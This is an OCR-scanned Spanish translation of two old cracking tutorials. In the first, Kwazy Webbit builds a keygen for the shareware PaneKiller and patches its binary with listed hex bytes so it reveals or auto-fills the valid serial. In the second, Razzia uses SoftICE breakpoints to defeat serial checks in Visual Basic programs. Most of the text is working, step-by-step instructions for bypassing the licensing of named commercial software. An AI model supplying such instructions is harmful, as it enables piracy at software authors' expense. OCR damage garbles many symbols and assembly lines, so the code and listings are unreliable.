Entonces hay otra 'variable' siendo usada: [EBP+08] 

(recuerda, esta es una nueva función por lo tanto, esto NO es la misma variable que hDlg, aúnque se vean iguales). Cuando descargamos esta variable (d ebp+8'), vemos que se ve como una dirección. (Almacenada en orden inverso, recuerda eso.) 
En mi caso, y si no estoy errado, debería ser lo mismo para ti, decía 'DO F6 67 00'. Cuando descargamos esa dirección (d 67F6DO”), vemos que es nuestro nombre. Entonces, esa variable tiene la dirección al inicio de nuestro nombre. En C/C++ esto 
podría ser un puntero al inicio del array de caracteres si no estoy errado. Por supuesto! Es el parametro que fue empujado antes de la llamada a esta función! Sugiero que empieces por escribir todo el código en esta función, excepto, por supuesto 
todo el 'trabajo de limpieza' con EBP y ESP en el inicio y al final de la función. Utiliza cualquier nombre para tus variables locales. (yo sé, yo sé... Hay monton de crackers preguntando por qué demonios estoy diciendote que escribas el código en 
lugar de decompilar el programa, y hacer un copyézpaste. Bueno, la razón es que queria mantener la sección "Herramientas Necesarias' en un mínimo absoluto, también estoy esperando que comiences a pensar un poco acerca de que está haciendo el 
código.) 

Obteniendo el parametro nombre de la función, puedes (pienso) usar la sintaxis que usa tu lenguaje de programación. (De nuevo, puedes querer revisar tu referencia sobre este tema) Si hiciste todo bien, deberías tener una función que podrías llamar 
NameToNameCode el cual usa un parametro (la dirección a nuestro nombre)m y retornar un valor DWORD: nuestro Nombre-Código. Entonces haces un XOR a ese valor con 047D6D93h, dandote el s/n! 

Ahora hay un problema final: como lo muestras al usuario? Necesitaras convertirlo a la cadena del inicio. Por supuesto podríamos escribir nuestra propia función (yo lo hice), pero hay una forma facil de hacer esto. Hay una API diseñada 
especialmente para este tipo de cosas: wsprintf. Si revisas tu Referencia API, verás que puede convertir números a cadenas, etc. La explicación que encontrarás no es muy buena (no la entendí al principio), entonces te daré (espero) una explicación 
fácil aquí. Cuando quieres imprimir una variable en una cadena, necesitará ser convertida a caracteres. Hay varias formas de hacerlo, dependiendo en que variable está: un caracter simple, otra cadena, un + decimal, y un número hex. Para mostrar la 
función en la parte de la cadena en que la quieres, necesitarás poner un simbolo allí. wsprintf usa el token '%', mas un caracter indicando cual es la variable. 


Ejemplo (en C/C++): 

int Age = 50; 
char Question = A 
char[50] buffer; 


wsprintf (£buffer, "Wow, yas$c tienes $d ",Age, char); 


Despues de esta llamada, buffer sería "Wow, ya tienes 507" 


En ASM (masm) esto sería: 


FormatString db "Wow, yasc tienes Sd ",0 ¡Recuerda, las cadenas terminan con cero.. 
buffer db 50 dup(0) ; Esto crea un array de 50 bytes todos inicializados en 0 
Age dd 50 


Question db rd 


push char ¡Recuerda, empujando en orden inverso 
push Age 

lea edx, FormatString 

push edx 

lea edx, buffer 

push edx 

call wsprintf 


(nota que no puedes usar la sintaxis de 'invocación' MASM aquí, porque wsprintf tiene un numero desconocido de parametros.) 


Ahora solo necesitamos convertir el numero a una cadena, no necesitamos algo mas. Buscando en la referencia, vemos que para un Hexadecimal en mayusculas necesitas usar "%.X". Así, eso va a ser nuestro FormatString (Formato de cadena) total. 
También, el numero que queremos usar, es retornado en EAX, entonces podemos usar EAX como nuestro parametro usando ASM: 


FormatString db "ox" 
buffer db 50 dup(0) 


O ¡La llamada a NameToNameCode 
push eax 
lea edx, FormatString 
push edx 

lea edx, buffer 

push edx 

call wsprintf 


No tan mal, eh? 
En C/C++ lo mismo puede ser logrado haciendo: 


char[50] buffer; 
wsprintf (8£buffer, "$SX",NameToNameCode (name) ); 


Todo lo que tenemos que hacer ahora, es poner el buffer en el campo de texto 2, para que el usuario pueda verlo también. 


En masm: 


invocar SetWindowTextA, hWnd, ADDR buffer 


En C/C++: 


SetWindowTextA (hWnd, ¿buffer); 


Et voila! Hemos hecho un Key Gen. Compilalo, y pruebalo. 


La forma DREAD 


Esta es una variación de 'La Forma PROFESIONAL). Es difícil pero también muy cool. La llamo la forma DREAD porque es el método preferido de varios miembros de DREAD. Vamos a tomar PaneKiller, y construir el keygen en el mismo 
programa. El código fuente solo puede ser decompilado en assembler, y es por eso que dije antes que si no conoces assembler, puedes olvidarte de crackear en la forma DREAD. 


Vamos a agregar código al programa, así que necesitaremos algo de espacio para meterlo allí. Nunca hay un cuarto vacio en el programa (por qué será?), así con la mayoria de programas deberás agregar tu propio código al final y luego ocuparte en 
tonterias con las interioridades del programa padre (ver los ensayos de Razzia al hacer su razziapad para mas info). En nuestro caso no tenemos que ir a través de este (dificultoso) proceso, porque podemos 'hacer' algo de espacio dentro de 
PaneKiller. 

Puedes estar preguntandote donde, porque no parece ser un espacio disponbile obvio. Sin embarco, despues de pensar acerca de como hacerlo, Recordé algo. Siempre hemos asumido que usa nuestro nombre para calcular nuestro S/N. Pero como 
vimos antes, si fallamos esa prueba revisa para ver si el código es correcto para nuestra compania. Aha! Ahora, si asumimos que el s/n 'casa' con nuestro nombre (justo como hemos hecho hasta ahora), no necesitamos este código. Podemos quitarlo, 
y poner nuestro keygenerator en su lugar. Un problema viene: es solo un pequeño pedazo de código, como supuestamente ajustaremos un keygenerator completo allí? Bueno, la respuesta es simple, usa solo el equipo disponible. Usa lo que los 
codificadores te han dado. Como vimos, el programa hará lo siguiente cuando ingresas un serial equivocado: 


)- Calcula nuestro 'nombre-código' 
(2)- Calcula nuestro 'código-compania' 
(3)- Revisa si el código es correcto para el nombre ingresado y falla. 
)- Revisa si el código es correcto para la compania ingresada y falla. 
)- Retorna EAX=0 
(6)- Despliega un messagebox diciendo que hemos ingresado un s/n incorrecto 


Como ya has notado, el código en (2) no es necesario mas, porque no vamos a realizar (4) más. Esto nos dará algo mas de espacio para trabajar. Echemos un vistazo al código: 


00402E42 mov ecx, dword ptr [ebp+0C] ¡Poner la dirección de nuestro nombre en ECX 
00402E45 push ecx ¡Empujar ECX para usarlo en la función 

00402E46 call 004031AA ¡Llamar a la función para obtener el nombre-código 
00402E4B add esp,00000004 ¡Restaurar la pila despues de llamada la función 
00402E4E mov dword ptr [ebp-08],eax ¡Almacenar el nombre-código en memoria 
00402E51 mov edx, dword ptr [ebp+10] ;Poner la dirección de nuestra compania en EDX 
00402E54 push edx ¡Poner EDX para usarlo en la función 

00402E55 call 004031AA ¡Llamar la función para obtener código-compania 
00402E5A add esp,00000004 ¡Restaurar la pila despues de llamada la función 
00402E5D mov dword ptr [ebp-0C],eax ¡Almacenar el código-compania en memoria 


Ves? podemos quitar la segunda mitad completa! Eso es 00402E60-00402E51 = 0Fh o 15 bytes. 
El siguiente código consiste de los 2 chequeos para ver si el s/n era correcto: 


00402E60 mov eax, dword ptr [ebp-04] ¡Poner el s/n en EAX 

00402E63 xor eax, dword ptr [ebp-08] ¿XOR s/n con nombre-código 

00402E66 cmp eax, 047D6D93 ¡Comparar el resultado con 047D6D93h 

00402E6B ¡ne 00402E74 ¿Si no es el mismo, revisar si 'casa' el código-compania 

00402E6D mov eax, 00000001 ;De otra forma, poner 1 en EAX, Causando que el programa sea registrado 
00402E72 jmp 00402E8B ¡Saltar al final de la función, retornar EAX=1 

00402E74 mov ecx, dword ptr [ebp-04] ¡Poner el s/n en EAX 

00402E77 xor ecx, dword ptr [ebp-0C] ¿XOR s/n con el código-compania 

00402E7A cmp ecx, 0177F29F ¡Comparar el resultado con 0177F29F 

00402E80 ¡ne 00402E89 ¡Si no es lo mismo, saltar a 00402E89 

00402E82 mov eax, 00000001 ;De otra forma, poner 1 en EAX, causando que el programa se registre 
00402E87 jmp 00402E8B ¡Saltar al final de la función, retornar EAX=1 

00402E89 xor eax, eax ¡EAX Cero, causando que el programa continue no registrado 


00402E8B - 004202E8E Limpiar todo regresar a la función 


En este código, podemos saltar el pedazo de 00402E74 a -sin incluir- 00402E89. No podemos saltar la instrucción en 00402E89 porque el programa necesita 1 o O en EAX para que no se trabe. 
De cualquier forma, Esto nos dará otro: 
00402E89-00402E74 = 15h o 21 bytes de espacio. 


Esto trae el total a 15 +21 =36 bytes de espacio para que usemos. Cualquier programador de lenguajes de alto nivel probablemente vería esta cantidad como algo que no vale mencionar, pero para cualquier codificador decente en ASM, esto es 
relamente suficiente. (Lo Veras despues, ahora tenemos un cuarto para ahorrar :) 


Comencemos a codificar... 


Bien, asumire que has leído la parte acerca de como hacer un keygen, porque no voy a explicar el procedimiento completo de nuevo. Mencione antes que el truco al hacer este tipo de keygens construidos en una pequeña cantidad de espacio, es usar 
lo que el programa te da al maximo. Hagamos eso un poco mas concreto: En nuestro Keygen, lo mas dificultoso del código 'real' fue donde reproducimos el código del programa usado para calcular el nombre-código desde el nombre. Bien, no 
tenemos que hacer eso DEL TODO aquí. Ya ha sido calculado por el programa, y almacenado en memoria en [ebp-08]. Bueno, eso nos libra de un monton de código. Otra parte de nuestro keygen, fue el uso de wsprintf para convertir el ++ hex a 
cadena, así podriamos verlo como un usuario. Si usas WDasm para decompilar PaneKiller y ver en las funciones API importadas, la función wsprintfA (es la última en la lista). Todo lo que tenemos que hacer es usarla... K3W1! Lo han hecho tan 
fácil! :] 

A proposito, en caso que te preguntes: wsprintf es lo mismo que wsprintfA. Así, eso debería ser lo suficientemente fácil para usar en nuestro código. Que mas necesitamos? Oh, por supuesto.. Necesitamos alguna forma de mostrar (la cadena de 
versión de) nuestro s/n al usuario. Oi, suena como un problema. Bueno, no lo es! ya sabemos que el usuario va a ver un messagebox diciendo que tenia un Serial erroneo. Por qué no deberiamos sobreescribir ese texto con nuestro s/n calculado? 
Entonces el messagebox mostraría el s/n REAL si has ingresado uno erroneo. 


Ahora, codifiquemos ya... 


Antes de empezar a codificar, hay un problemas mas al que necesitamos dirigirnos: hay una parte del programa original (00402E60-00402E72) entre nuestros 2 code snippets. Esto significa que no podemos almacenar cosas en los registros usados 
en esa parte. En este caso, no es un gran problema. El código solo usa EAX. Bien, pienso que podemos evitarlo usando EAX para el almacenamiento entre las 2 secciones, no lo harás? :) 
Por esto tambien digo que el code snippet no usa la pila del todo (no hace PUSH o POP o alguna otra cosa metiendose con EBP o ESP), Así podemos ir adelante y usar la pila también. 


Cuanto mas voy a tener que leer para obtener la parte del código?! 
Bueno, aquí comenzamos con el código. 
Oh. 


Sabemos el nombre-código almacenado en [ebp-08], entonces, pongamoslo en EAX: 


mov eax, dword ptr [ebp-08] 


Ahora hacemos la misma cosa que hicimos en nuestro keygen, lo XOReamos con 047D6D93h : 


xor eax, 047D6D93h 


Tenemos el s/n valido en EAX, ahora tenemos que convertirlo a cadena: 


push eax 

lea eax, [ebp-0C] 

push eax 

mov  [ebp-0C], 00005825 
push 00402194 

call wsprintfA 


NOTA: PUEDES seguir usando EAX para todo, pero para almacenamiento, porque el programa original no almacena nada allí (Puedes ver eso por la instrucción en 00402E60). 


La segunda línea puede llamar a alguna explicación mas: la variable DWORD en [ebp-0C] solia ser el 'código-compania', así que ya no es usada mas. Podemos usarla para nuestros propositos, almacenando una DWORD allí. Pero que es 00005825? 
Bueno, primero, va a ser puesto en memoria al revés: 25 58 00 00 

esta es una cadena terminada en cero: '%X',0,0 

Puedes reconocerlo por el tutorial Keygen, como el formato de cadena para convertir numeros hex a cadena. No podemos empujarlos directamente (pe PUSH 00005825), porque la función wsprintf requiere la dirección a la cadena a formatear, no la 
cadena misma, así que hacemos un 


lea eax, lebp-0C] 


para obtener la dirección de la cadena en EAX, y luego 


push eax 


para darlo a la función. 

La ultima variable a se empujada (la primera en la descripción API) es el destino de la cadena. Como dijimos antes, la imprimiremos sobre el mensaje 'invalid code'. Para obtener la dirección a esa variable, vemos (en WDasm) en "Data Hex". 
Buscamos el mensaje: 

"The registration code you have entered is incorrect. Please try again.” 

La encontrarás en 00402194, así que empujamos eso a wsprintfA. 

Entonces, llamamos a la función wsprintfA (después de todo, sus parametros son empujados) u solo deja que el código original continue. Deberiamos ver la messagebox que antes decia que nuestro código es invalido, y ahora deberia mostrarnos el 
código real. Pero aún no estamos en eso. Tenemos que cambiar el código primero. No tenemos el código fuente, no podemos ingresar nuestro código y compilarlo. Vamos a usar un editor hex en su lugar. Para hacer eso, vamos a tener que 
reemplazar la representación hex del código antiguo con la representación hex del nuevo (wow, palabras duras). 

Podemos encontrar el código viejo muy facil, está despues de las instrucciones desensambladas. Solo escribe el código para las partes que vamos a reemplazar. 

Para la primera parte deberías tener: 


8B 55 10 52 E8 50 03 00 00 83 C4 04 89 45 F4 


(este es el código que representa las instrucciones) 


La segunda parte debería ser: 


8B 4D FC 33 4D F4 81 F9 9F F2 77 01 75 07 B8 01 00 00 00 EB 02 


Pero como traducimos nuestro assembler a algo como eso? 


Con programas normales, es simple. Solo usa un compilador para eso. Pero no tenemos un porgrama completo. Solo tenemos que reemplazar una pequeña parte de él. La forma en que me lo figuré como eran los códigos apropiados, fue viendo los 
códigos para instrucciones similares en el código de PaneKiller (Decompilado en WDasm), y viendo que era el código que ellos usaban. Permiteme demostrarlo: 
Tengo 


mov eax, dword ptr[ebp-08] 
Cuando comence a ver en la fuente de PaneKiller (comencé en un lugar aleatorio), rapidamente encontré estas 2 instrucciones: 


:0040E6EC 8B45A0 mov eax, dword ptr [ebp-60] 
:0040E6FA 8B4590 mov eax, dword ptr [ebp-70] 


Ahora, comieza a pensar en como el código podría funcionar. Te lo diré: '8SB45xx' es usado para cada instrucción 'mov eax, dword ptr [ebp+xx]'. En nuestro caso, xx es negativo (-60 and -70). Cuando el contador va bajo cero, comienza sobre FF. Es 
facil de explicarlo si lo ilustramos: 


8B45FF mov eax, dword ptr [ebp-1] 
8B4500 mov eax, dword ptr [ebp] 
8B4501 mov eax, dword ptr [ebp+1] 


Sabiendo eso, podemos figurarnos que el código para: 


mov eax, dword ptr [ebp-08] 


debería ser: 


8B45F8 


Solo haz algo similar con los otros comandos, y tendras la lista completa de códigos: 


8B45F8 (O = mov  eax, dword ptr [ebp-08] ) 
35936D7D04 xor eax, 047D6D93 ) 
50 (o= push eax ) 


8D45F4 (| = lea eax, [ebp-0c] ) 
50 (ss push eax ) 
C745F425580000 (O = mov  [ebp-0c], 00005825 ) 
6894214200 (O= push 00422194 ) 
FF153CE24100 (O = call dword ptr [0041e23c] ) 


Asegurate de recordad que código representa cada instrucción! La razon para esto es el bloque de código original a la mitad del nuestro. No podemos cortar una instrucción sencilla a la mitad, entonces el corte tendrá que ser hecho entre 2 
instrucciones. Recuerda, tenemos 15 bytes en la primera parte, y 21 en la segunda. 
Hice el corte entre la segunda 


push eax 


mov  [ebp-0c], 00005825 

Lo que me da: 

8B45F835936D7D04508D45F450 (13 bytes) 

para la primera parte, y 
C745F4255800006894214200FF153CE24100 (18 bytes) 


para la segunda parte. 
Puedes notar que tendrás algo de espacio vacio ahora (15-13=2 en la primera parte, y 21-18=3 en la segunda), Esto no es un gran problema. Puedes NOPearlos. Las instrucciones NOP no hacen absolutamente nada, excepto, tomar un poco mas de 1 
byte de espacio. El código para NOP es 90. Esto hace: 


8B45F835936D7D04508D45F4509090 (15 bytes) 
para la primera parte, y 
C745F4255800006894214200FF153CE24100909090 (21 bytes) 


para la segunda parte. 
Eso debería hacerlo. Ahora sabemos que código queremos reemplazar, y sabemos que lo reemplazará. Hagamoslo que ocurra! Abre Panekill.exe En tu hex editor favorito, y encuentra el código que queremos reemplazar. Hay 2 formas para hacerlo: 


e Usa la opción 'search' en tu hex editor, y busca los bytes que representan el código original. Asegurate de usar una cadena lo suficiente mente larga, para que no reemplaces una parte equivocada del programa. Para asegurarte que solo hay 
una cadena, utiliza 'search again' para ver si encuentra otra concordancia. Si sí, has la cadena de busqueda mas larga. 


e En WDasm, haz doble click en la primer instrucción del código que quieres reemplazar, de manera que esté resaltado. Ahora mira en la status bar. Te da el 'Offset' en el código. Ve allí, en tu hexeditor. Deberías ver el código que estás 
buscando. 


Reemplaza ambas partes, y grabalas. ASEGURATE DE HACER UN BACKUP!! 
Ahora abre el programa, y trata de registrarlo. Ingresa cualquier info e ingresa un s/n incorrecto. Presiona 'OK', y deberías ver una messagebox con el reg code correcto! Realmente k3w1, eh? 


TAMBIEN GUARDA TU NUEVA COPIA YA PARCHADA ANTES DE PROCEDER! 
Todo trabaja ahora (si todo caminó bien), sin embargo, aún hay algunas mejoras que pueden ser hechas. Por ejemplo, cuando vemos el código en 00402E51: 


mov dword ptr [ebp-08], eax 
mov eax, dword ptr [ebp-08] 


comprenderás (espero) que el segundo comando es una total perdida de tiempo y espacio. (nota que la primera no lo es, porque almacena el valor en memoria para usarlo despues) 
así, podemos NOPear el comando en 00402E54 reemplazando 


8B45F8 


909090 


(Este cambio es realmente inútil, pero no puedo ayudar, pero si obsesionar con estas cosas :) Tambien, la MessageBox que tuvimos, se ve muy mamona. Tiene el s/n correcto. Nada mas, nada menos. En nuestro hexeditor, podemos reemplazar 


The registration code you have entered is incorrect. Please try again. 


con algo como 


[Kwazy Webbit] 
Tu código correcto es: 


(Para ir a la siguiente línea, usa un par CR/LF. El código es VOAOD) 
Si no cambiamos nada mas, el reg code se sobreescribira sobre nuestro texto, y seguirá siendo lo único en la messagebox. Para cambiar eso, deberiamos hacer que el wsprintfA escriba el código en un lugar diferente: El final de nuestro texto. 
Para hacerlo, todo lo que tenemos que hacer es cambiar el último parametro que es empujado a wsprintfA (IpOut) agregandole el tamaño de nuestro texto. Así en mi caso, Cambiaría: 


push 00402194 


p 


push 0040211B 


Eso es todo para crackear en la forma DREAD. 


Estilo Kwazy Webbit 


Esto es como una variación de 'La Forma DREAD”. Mientras me ocupa en tonterias de PaneKiller, escribiendo el capítulo previo, noté que 'La Forma DREAD', aunque se acerca, no es perfecta. Cuando ingresas un s/n incorrecto, la messagebox 
aparece, y te da tu serial correcto. Podrías pensar que es tan bueno como un keygen puede se, correcto? pues no. Hay una mejora mas que puede ser hecha para perfeccionarlo. Veamos, ahora tienes que seguir viendo la messagebox, y recordadr tu 
código (oescribirlo). Que pasaría si pudieramos hacer que el programa ingresará el serial por sí mismo? PUEDE ser hecho. 


Estoy asumiendo que has hecho todos los cambios mencionados en el capitulo previo (SIN las mejoras extra!). Ahora, el programa muestra una messagebox solo con el s/n. 
Ya vimos que el programa usa GetDlgltemTextA para conseguir nuestra info de las textboxes. Hay otra función APT para poner la info dentro de esos lugares: SetDlgltemTextA. 
Comparemos GetDlgltemTextA con SetDlgltemTextA ahora: 


GetDlIgltemTextA: SetDlgltemTextA: 
hDlg hDlg 

nIDDlglItem nIDDlgltem 
IpString IpString 
nMaxCount 


(Para una explicación detallada acerca de estos items, revisa tu Referencia, o mas adelante en este ensayo) 
Sabiendo que queremos poner el serial valido en el mismo textfield, notamos 2 cosas: 


e El 'hDlg' debería ser lo mismo para ambas llamadas, ya que es el mismo cuadro de diálogo. 
e El 'nIDDlgltem' debería ser lo mismo para ambas llamadas, ya que es el mismo campo de texto. 


Para encontrar los valores necesarios, miramos la llamada del programa para obtener nuestro reg code. Encontraremos (en WDasm) que usa 


:00403063 8B4D08 mov ecx, dword ptr [ebp+08] 
:00403066 51 push ecx 


Para empujar hDlg, y 
:0040305E 68FE030000 push 000003FE 


para empujar nIDDlgltem, entonces usaremos lo mismo en nuestra llamada a SetDlgltemTextA. 
Ahora solo necesitamos saber el IpString. Eso es fácil. Es la dirección que usa wsprintfA para imprimir nuestro reg code: 


push 00402194 


(Si has hecho las mejoras a la messagebox, necesitarás ajustar su valor) 


Así, el código completo para poner el serial en el campo de texto apropiado sería: 


push 00402194 

push 000003FE 

mov ecx, dword ptr [ebp+08] 
push ecx 

call  SetDlgltemTextA 


Vamos a enfrentarnos al mismo problema que en el capítulo anterior: no tenemos ningun espacio para ponerlo. La forma en que está el programa, vemos la messagebox con nuestro código, lo cual ya no necesitaremos mas despues de este cambio. 
Simplemente podemos quitar esta parte del programa, y reemplazarla con nuestro propio código. La llamada total (Empujando parametros y la llamada misma)a la messagebox es: 


:00403102 6A40 push 00000040 

:00403104 8B0D1C2B4200 mov  ecx, dword ptr [00422B1C] 
:0040310A 51 push ecx 

:0040310B 6894214200 push 00422194 

:00403110 8B5508 mov edx, dword ptr [ebp+08] 
:00403113 52 push edx 

:00403114 FF158CE24100 call MessageBoxA 

:0040311A 


(Es un total de 0040311A-00403102=18h o 24 bytes) 


Para encontra la representación hex para nuestro código, usa el procedimiento descrito en el capítulo previo. Deberias terminar con algo así: 


6894214200 ( = push 00422194 ) 
68FE030000 ( = push 000003FE ) 
8B4D08 ( = mov .ecx, dword ptr [ebp+08] ) 
51 ( = push ecx ) 
FF152CE34100 ( = call dword ptr [0041E32C] (call SetDlgItemTextA) ) 


cuyo total es de 20 bytes. Tenemos 4 comandos NOP entonces: 
6894214200 68FE030000 8B4D08 51 FF152CE34100 90 90 90 90 90 


Justo usa tu hexeditor (como en los capítulos previos) para cambiar el código original de la 'MessageBoxA' a tu propio código 'SetDlgltemTextA'. Abre PaneKiller, y trata de registrarlo con tu nombre y s/n incorrecto. Cuando presiones el botón 
'OK', automaticamente debería reemplazar tu s/n falso con el real!! Presiona 'OK' de nuevo, t debería ser registrado a tu nombre. 

Has aprendido a 'crackear como Kwazy'. Trata algo similar con otros programas, experimenta tanto como sea posible. (Recuerda: Siempre has backups!) 

Diviertete! 


-NOTA- Si tu copia de PaneKiller ya está registrada: 
abre 'c:1windowsWegedit.exe' (solo 'regedit' lo hará), y ve a HKEY_LOCAL_MACHINE/SOFTWARE/MaDdoG/PaneKiller. Borra 'Registered User”, 'Registered User Company' y 'Registration code'. Ahora tienes la versión shareware de nuevo. 


PALABRAS FINALES 


Catalogué esta protección baja, porque dudo que un Newbie total la crackearía por si mismo, pero casi cualquier cracker medio o avanzado no tendrá mucha dificultad. La razon por la que escogí esta protección, es porque es relativamente franco, y 
muestra varios aspectos interesantes del cracking, como revertir instrucciones XOR. 
También, después encontre que este objetivo tenia un potencial real para crackearlo en 'La Forma DREAD', y tambien al 'Estilo Kwazy Webbit' (para mas info, lee los capitulos apropiados). 


Bueno, este fue mi primer ensayo, espero que hayas aprendido algo. Probablemente habrá mas pronto, pero no ahora. Este me tomó mucho tiempo, y el verano se acerca! 


Saludos a: todos los miembros de DREAD, koolzio (A donde demonios fuiste?), toda la otra gente que conozco en el IRC. Tambien saludos a: Gente como Sandhopes, Hyrax, Dosy, Jo, Gelf y todos los otros que veo en IRL. 


Gracias especiales a: Iczelion y Hutch, por enseñarme win32 assembly 


Deseandoles un DREADful day (día terrible) ;-), 

Kwazy Webbit de DREAD 

"La única cosa que me mantiene sano, es mi colección de papas cantoras...” 
Buscame en IRC. Usualmente estoy en EFnet en uno o mas de estos canales: 
+twin32asm, *+DREAD, tcracking4newbies y tcracking 


Los veo allí! 


O1999 Kwazy Webbit productions 


Como crackear todos los programas de 
Visual Basic 


(un Tutorial) 


por Razzia 
traducido por 4[G]JoLe[E]* 
** Este Tutorial fue tomado "prestado" de la página de fravia de 
Ingenieria Inversa de Código *** 


[ Cortesia de la página de Fravia de ingenieria inversa 
Este Tutorial es EXTREMADAMENTE interesante: mas y mas 
programas han sido escrito en lenguajes sobreinflados como Visual 
Basic o Delphy, y como correctamente señala Razzia, esto hace que 
estos programas sean mas crackeables que las aplicaciones 
"normales"! Además encuentro sumamente inteligente el estilo de 
Razzia (los blocks "mas info acerca del programa” deberían ser 
usados por todos los crackers desde ahora, por ejemplo) y muy bien 
estructurado. Sigue su consejo y siempre "haz el punto" (considera tu 
aproximación) *ANTES* de saltar a la sesión de cracking! 
Otra técnica muy interesante, útil para esquemas de protección que 
cambian el algoritmo matemático cada vez que son instalados, es el 
parcheado de los dll de VB por si mismo, para MOSTRARTE (en un 
mesagebox que llamarás) que password deberías ingresar 
Disfruta! 


tutorial de razzia para el crackeo de vb 


Introduction 


Ultimamente mas y mas programas salen que son probramados en 
VB. Puesto que los programas en VB son material desconocido para 
la mayoria de los crackers, los ignoran y los tachan de 'incrackeables". 
En este documento te mostraré que esto no es cierto por su 


protección basada en texto (serials/reg*'s). 


Como herramientas solo necesitaremos SoftlCE y Hiew en un caso. 
Además, asumo que el lector está familiarizado con el cracking. Para 
principiantes, recomiendo los grandes tutoriales hechos por +orc y 
ed!son sobre crackeo en windows. Pero tratare de hacer el mejor 
esfuerzo para hacer este texto entendible para todos los que tienen 
un minimo conocimiento sobre cracking. 


Preparandonos 


Antes de empezar a bombardearte con listados en asm, tomemos un 
momento para pensar acerca de con que estamos tratando. 
Estamos tratando con exe's que no tiene código por si mismos, pero 
que en lugar, hacen llamadas a librerias con funciones standard. 
Qué significa esto? esto significa que hay una gran desventaja para 
proteger programas escritos en VB. Por qué? piensas que los 
escritores de dll de VB hacen 10 funciones diferentes que podrías 
usar para comparar 2 cadenas? No, por supuesto que no. Ellos 
hacen la dll para ser tan eficiente como sea posible y pequeña como 
sea posible. 


Por consiguiente una buena suposición es que solo habrá 1 (o 2) 
lugar(es) dentro de la dll donde las 2 cadenas pueden ser 
comparadas. Y este es el caso, como verás si terminas de leer este 
documento. Ya empezó a brillar la pequeña lampara en tu cabeza? ;-- 


) 


No sería grandioso si supieramos en que parte de la dll, son 
comparadas 2 cadneas? Sí, sería grandioso. Esto reduciría el crackeo 
de VB a un aburrido trabajo de fijar un simple breakpoint en el lugar 
indicado. Continua leyendo para mas detalles. 


Estrategia 


Antes de continar, sería sabio fijar una estrategia (como deberias 
hacer siempre con todos los otros casos de cracking). 


Pensemos acerca de la protección ... Ingresas una cadena de texto, 
presionas enter u 'OK' o lo que sea. Luego windows pasa los dsatos 
ingresados en la dll VB. La dll VB hace lo que necesita para saber si 
los datos ingresados son correctos o incorrectos. Y obtienes un 
mensage, diciendote que ingresaste un buen/mal código. 


Así que donde estaría el eslabón débil en la cadena? la respuesta es 
donde windows pasa los datos que ingresaste a la dll VB. Ese es 
nuestro punto de entrada. Podemos hacer que SoftlCE interrumpa 
aquí. Y entonces estaremos en la fuente de la cadena de protección. 
Con la ayuda de breakpoints podemos monitorear que pasa con 
nuestro texto. 


Pienso que ahora tenemos suficiente información de fondo para 
crackear un primer ejemplo. 


Case 1 : The Collector v2.1 


The collector es una utilidad para crear y mantener tu colección de 
imagenes/fotos. No está mal para ser un programa VB. Mas info 
sobre el programa: 


Nombre  : The Collector v2.1 

Donde : http://intranet.ca/-logic/collectr.html 
Tamaño  : collectr.exe = 246.047 bytes 
Protección : serial 

DLL : Usa un dll VB3 <*******E****** YB3.DLL 


Encuentro fácil explicar las cosas por pasos. Por lo tanto, dividiré el 
proceso de crackeo en pequeños pasos : 


Paso 1 : Ejecuta The Collector justo al inicio te pedirá el serial 
Paso 2: Ingresa un serial tonto como '9876543210". 


Ahora presiona control-d para entrar a SoftlCE. En SoftlCE escribe 
'bpx hmemcpy' para colocar un breakpoint en la función hmemcpy del 
kernel. (Intermezzo : Qué es hmemcpy? Windows usa mucho 
hmemcpy en operaciones concernientes a cadenzas. En este caso, 
será usado para copiar el buffer con el texto que ingresamos al 
espacio de memoria de la dll CV. Recuerdas cuando dije que ibamos 
a interrumpir cuando windows pasara nuestra cadena a la dll VB?) 


Paso 3 : Deja SoftlCE con control-d. Y presiona 'OK". Esto hará que 
SoftlICE interrumpa justo en el inicio de hmemcpy. 


Paso 4: Ahora continuaremos rastreando mas en la memoria de la 
función hmemcpy para encontrar donde será almacenada la cadena 
que ingresamos. Mantente presionando F10 hasta que veas 
::¡Memory_copying_snippet 


JMP 9E9F 

USH ECX ¡Estas líneas copian el SHR 
EX 02 ¡Cadenas en ds:si a es:di 
REPZ MOVSD ¡el REPZ MOVSD! 

BOB: HEX 

NO “HCX+03 

REPZ MOVSB ¡el REPZ MOVSB! 

XOR DX,DX 


Paso 5: Justo antes de REPZ MOVSD has un "ed si'. Verás el texto 
que ingresaste, en mi caso, muestra '0987654321". 


Has un 'ed es:di' y no versa nada (aún). Pero si presionas F10 y 
pasas el REPZ MOVSB versa el texto siendo copiado a su nueva 
localidad, donde el dll VB puede accesarlo. 


Paso 6: ahora sabemos donde está localizado el texto. Revisemos 
nuestra estrategia aquí. Nuestro plan fue encontrar donde la dll VB 
mantuvo nuestro serial, entonces pon un breakpoint en esa localidad 
de memoria y encuentra con que es comparado. Así que fijemos un 
bpr (breakpoint en rango) en la localidad donde vive nuestra cadena. 
Ya que las instrucciones REPZ MOVS(D/B) incrementaron el puntero 
en di (ahora apunta al final de nuestra cadena) hacemos un 'bpr es:di- 
8 es:di-1 rw'. No presiones enter, lee el paso 7 antes. 


Paso 7: Antes de tocar enter, te dire que debes esperar. SoftlCE 
romperá todo lugar donde el bloque de memoria con la cadena es 
leído o escrito. Por ejemplo romperas dentro de la función strlen 
donde la longitud de la cadena es calculada. Y romperas donde la 
cadena es copiada a otro lugar en memoria (por ejemplo con REPZ 
MOVSW). Cuando esto pasa, fija un nuevo bpr en la nueva localidad 
con la cadena. Tambien interrumpirá cuando la cadena o parte de 
ella es borrada. Si la cadena completa no es borrada completamente, 
no remuevas el bpr correspondiente. Solo remuévelo cuando la 
cadena completa sea escrita sobre algo mas. También romperás de 
Nuevo en hmemcpy. Hmemcpy leerá otro eco de la cadena en la 
memoria de la dll. Coloca un bpr allí también. Y finalmente romperás 
en la parte del código que hace la comparación (la instrucción que 
verás es REPZ CMPSB). Cuando alcancé esa parte de código, tuve 
4 breakpoints fijados. Un breakpoint para hmemcpy y 3 bpr's en 3 
ecos de la cadena (o partes de ella). 


Paso 8: Ahora hemos encontrado el código donde la dll VB3 hace la 
comparación, ahora podemso poner un breakpoint allí y desactivar los 
otros breakpoints. No los necesitaremos mas. HEMOS 
ENCONTRADO el lugar donde las cosas son comparadas en VB3. 


Lo que ves es esto: 


¡The VB3 compare _snippet: 


8BCA MOW -0X, AX 
F3A6 repz cmpsb ;¿<- aquí las Cadenas en 
ds:si y es:di 
: 7401 Je 8CB6 ; son comparadas 
9F lahf 
92 xchg ax, dx 
: 8D5E08 lea bx, [bp+08] 
: ESUEOG6 call 392€B 


